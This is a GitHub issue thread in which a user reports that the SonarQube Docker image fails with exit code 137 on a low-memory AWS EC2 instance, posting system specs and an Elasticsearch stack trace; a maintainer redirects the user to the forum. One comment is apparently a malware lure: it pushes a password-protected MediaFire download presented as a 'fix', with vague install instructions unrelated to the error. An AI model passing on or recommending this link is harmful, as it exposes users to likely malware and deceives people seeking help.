### ISSUE TITLE
sonarqube docker image shows 137 error code while running on EC2 instance

### ISSUE THREAD

**Issue by moakam** [SonarSource/docker-sonarqube#703]
I have spinned up a AWS free tier EC2 instance and installed docker , I used docker compose to run the sonarqube image on the docker container.

But the docker will not start the sonarqube process on my EC2 machine below is the EC2 specs,

root@ip-172-31-22-216 
--------------------- 
OS: Ubuntu 24.04 LTS x86_64 
Host: HVM domU 4.11.amazon 
Kernel: 6.8.0-1014-aws 
Uptime: 39 mins 
Packages: 945 (dpkg), 5 (snap) 
Shell: bash 5.2.21 
Terminal: /dev/pts/0 
CPU: Intel Xeon E5-2686 v4 (1) @ 2.299GHz 
GPU: 00:02.0 Cirrus Logic GD 5446 
Memory: 236MiB / 957MiB 

Error while running sonarqube,

2024.08.26 19:09:42 INFO  app[][o.s.a.AppFileSystem] Cleaning or creating temp directory /opt/sonarqube/temp
2024.08.26 19:09:42 INFO  app[][o.s.a.es.EsSettings] Elasticsearch listening on [HTTP: 127.0.0.1:9001, TCP: 127.0.0.1:42663]
2024.08.26 19:09:42 INFO  app[][o.s.a.ProcessLauncherImpl] Launch process[ELASTICSEARCH] from [/opt/sonarqube/elasticsearch]: /opt/java/openjdk/bin/java -Xms4m -Xmx64m -XX:+UseSerialGC -Dcli.name=server -Dcli.script=./bin/elasticsearch -Dcli.libs=lib/tools/server-cli -Des.path.home=/opt/sonarqube/elasticsearch -Des.path.conf=/opt/sonarqube/temp/conf/es -Des.distribution.type=tar -cp /opt/sonarqube/elasticsearch/lib/*:/opt/sonarqube/elasticsearch/lib/cli-launcher/* org.elasticsearch.launcher.CliToolLauncher
2024.08.26 19:09:42 INFO  app[][o.s.a.SchedulerImpl] Waiting for Elasticsearch to be up and running
Exception in thread "main" java.lang.RuntimeException: starting java failed with [137]
output:

error:

        at org.elasticsearch.server.cli.JvmOption.flagsFinal(JvmOption.java:120)
        at org.elasticsearch.server.cli.JvmOption.findFinalOptions(JvmOption.java:87)
        at org.elasticsearch.server.cli.MachineDependentHeap.determineHeapSettings(MachineDependentHeap.java:59)
        at org.elasticsearch.server.cli.JvmOptionsParser.jvmOptions(JvmOptionsParser.java:141)
        at org.elasticsearch.server.cli.JvmOptionsParser.determineJvmOptions(JvmOptionsParser.java:92)
        at org.elasticsearch.server.cli.ServerCli.startServer(ServerCli.java:248)
        at org.elasticsearch.server.cli.ServerCli.execute(ServerCli.java:100)
        at org.elasticsearch.common.cli.EnvironmentAwareCommand.execute(EnvironmentAwareCommand.java:54)
        at org.elasticsearch.cli.Command.mainWithoutErrorHandling(Command.java:85)
        at org.elasticsearch.cli.Command.main(Command.java:50)
        at org.elasticsearch.launcher.CaliToolLauncher.main(CliToolLauncher.java:64)
2024.08.26 19:09:47 WARN  app[][o.s.a.p.AbstractManagedProcess] Process exited with exit value [ElasticSearch]: 1
2024.08.26 19:09:47 INFO  app[][o.s.a.SchedulerImpl] Process[ElasticSearch] is stopped
2024.08.26 19:09:47 INFO  app[][o.s.a.SchedulerImpl] SonarQube is stopped

Am using java 17

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by carminevassallo** [comment]
Hi @moakam 👋 

thanks for raising this issue.

Could you please post your question in our [community forum](https://community.sonarsource.com/)? It will then get triaged to the right team :)

_Closing the issue as it will be handled in our forum_
